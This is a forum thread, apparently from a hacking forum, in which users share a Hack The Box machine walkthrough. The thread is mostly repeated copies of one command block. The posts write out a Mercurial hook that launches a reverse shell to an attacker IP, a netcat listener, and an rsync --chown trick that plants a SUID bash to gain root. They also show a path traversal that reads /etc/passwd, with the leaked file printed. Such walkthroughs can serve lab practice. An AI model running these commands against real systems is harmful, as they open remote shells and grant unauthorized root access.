[gfttjdb]

ROOT ROOT ROOT ROOT                                                                                                                Check sudo privileges:
Perform the following steps to escalate privileges:

bash

cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc

Add the reverse shell script at the last line in /tmp/.hg/hgrc:

javascript

[hooks]
post-pull = /tmp/revshell.sh

Execute:

bash

chmod +x the revshell.sh
sudo -u dev /usr/bin/hg pull /home/dev/app-production/

Once you have dev privileges:

    Command:

shell

    $ cd /home/dev/
    $ cp /bin/bash app-production/bash
    $ chmod u+s app-production/bash
    $ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
    $ /opt/app/bash -p

    You now have root access.

u deserve reputation

---

ROOT ROOT ROOT ROOT                                                                                                                Check sudo privileges:
Perform the following steps to escalate privileges:

bash

cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc

Add the reverse shell script at the last line in /tmp/.hg/hgrc:

javascript

[hooks]
post-pull = /tmp/revshell.sh

Execute:

bash

chmod +x the revshell.sh
sudo -u dev /usr/bin/hg pull /home/dev/app-production/

Once you have dev privileges:

    Command:

shell

    $ cd /home/dev/
    $ cp /bin/bash app-production/bash
    $ chmod u+s app-production/bash
    $ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
    $ /opt/app/bash -p

    You now have root access.

whats the inside of revshell.sh file ??

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed | /Thread-Free-HTB-All-Active-Challanges-Flags

[hackemall]

echo "#!/bin/bash" > /tmp/revshell.sh
echo "/bin/bash -i >/dev/tcp/10.10.x.x./4444 0<&1 2>&1" >> /tmp/revshell.sh
chmod +x /tmp/revshell.sh

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[hackemall]

set +H
echo "#!/bin/bash" > /tmp/revshell.sh
echo "/bin/bash -i >/dev/tcp/10.10..x.x/4444 0<&1 2>&1" >> /tmp/revshell.sh
chmod +x /tmp/revshell.sh
set -H
sudo -u dev /usr/bin/hg pull /home/dev/app-production/

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[grisun0]

ROOT ROOT ROOT ROOT                                                                                                                Check sudo privileges:
Perform the following steps to escalate privileges:

bash

cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc

Add the reverse shell script at the last line in /tmp/.hg/hgrc:

javascript

[hooks]
post-pull = /tmp/revshell.sh

Execute:

bash

chmod +x the revshell.sh
sudo -u dev /usr/bin/hg pull /home/dev/app-production/

Once you have dev privileges:

    Command:

shell

    $ cd /home/dev/
    $ cp /bin/bash app-production/bash
    $ chmod u+s app-production/bash
    $ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
    $ /opt/app/bash -p

    You now have root access.

u deserve reputation

---

ROOT ROOT ROOT ROOT                                                                                                                Check sudo privileges:
Perform the following steps to escalate privileges:

bash

cd /tmp; mkdir .hg; chmod 777 .hg; cp ~/.hgrc .hg/hgrc

Add the reverse shell script at the last line in /tmp/.hg/hgrc:

javascript

[hooks]
post-pull = /tmp/revshell.sh

Execute:

bash

chmod +x the revshell.sh
sudo -u dev /usr/bin/hg pull /home/dev/app-production/

Once you have dev privileges:

    Command:

shell

    $ cd /home/dev/
    $ cp /bin/bash app-production/bash
    $ chmod u+s app-production/bash
    $ sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
    $ /opt/app/bash -p

    You now have root access.

whats the inside of revshell.sh file ??

#!/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.2/11111 0>&1"

bu your ip and port

[dogedofedoge]

sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/

doing this asks for dev;s password, how do we get that?

[hackemall]

yes you got to get shell into dev first

---

this gets you to dev echo "#!/bin/bash" > /tmp/revshell.sh
echo "/bin/bash -i >/dev/tcp/10.10.x.x/4444 0<&1 2>&1" >> /tmp/revshell.sh
chmod +x /tmp/revshell.sh
nc -lvnp 4444

---

this is the trigger sudo -u dev /usr/bin/hg pull /home/dev/app-production/

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[mbaker5159]

would like to learn more about this set of commands, any reference link?

[hackemall]

then thi makes you root cp /bin/bash /home/dev/app-production/bash
chmod u+s /home/dev/app-production/bash
sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* --chown root:root /opt/app/
/opt/app/bash -p

---

1. Initial Enumeration as qa User

When you were the qa user, you ran the sudo -l command, which revealed:

bash

User qa may run the following commands on localhost:
(dev : dev) /usr/bin/hg pull /home/dev/app-production/

This was a critical piece of information because it told you that the qa user could execute a Mercurial (hg) command as the dev user. This opened up the possibility to execute something malicious while posing as dev.

2. Understanding hg (Mercurial) Hooks

Mercurial is a version control system similar to Git. It allows you to automate actions with "hooks"—scripts that are triggered when certain actions (like a pull or commit) occur.
Knowing this, you could use a malicious hook to execute commands as the dev user whenever you performed a hg pull. This led to the idea of creating a reverse shell script in the hg configuration that would be executed when pulling from a repository.

---

Privilege Escalation from dev to root

After gaining a shell as dev, you checked the sudo -l privileges for dev and found that dev could run rsync with elevated privileges:

bash

sudo /usr/bin/rsync -a --exclude=.hg /home/dev/app-production/* /opt/app/

The key here was the --chown flag, which allowed you to change the ownership of files being copied. You copied a SUID-enabled version of bash to /opt/app/, which would execute as root when run.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[sanish11]

We can leak /etc/passwd using the export function. Intercept response and forward export/../../../../../../etc/passwd and we get it.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
pollinate:x:102:1::/var/cache/pollinate:/bin/false
polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
syslog:x:103:104::/nonexistent:/usr/sbin/nologin
uuidd:x:104:105::/run/uuidd:/usr/sbin/nologin
tcpdump:x:105:107::/nonexistent:/usr/sbin/nologin
tss:x:106:108:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:107:109::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
dev:x:1000:1000:dev:/home/dev:/bin/bash
mysql:x:110:110:MySQL Server,,,:/nonexistent:/bin/false
caddy:x:999:988:Caddy web server:/var/lib/caddy:/usr/sbin/nologin
postfix:x:111:112::/var/spool/postfix:/usr/sbin/nologin
qa:x:1001:1001::/home/qa:/bin/bash
_laurel:x:996:987::/var/log/laurel:/bin/false

im am bit confussed on this where to do and how to do

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[mrdot457]

How did you guys found the admindashboard, and from where did you get the script to get admin jwt toke. can you please explain it to me

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Spamming | https://breachforums.ai/Forum-Ban-Appeals if you feel this is incorrect.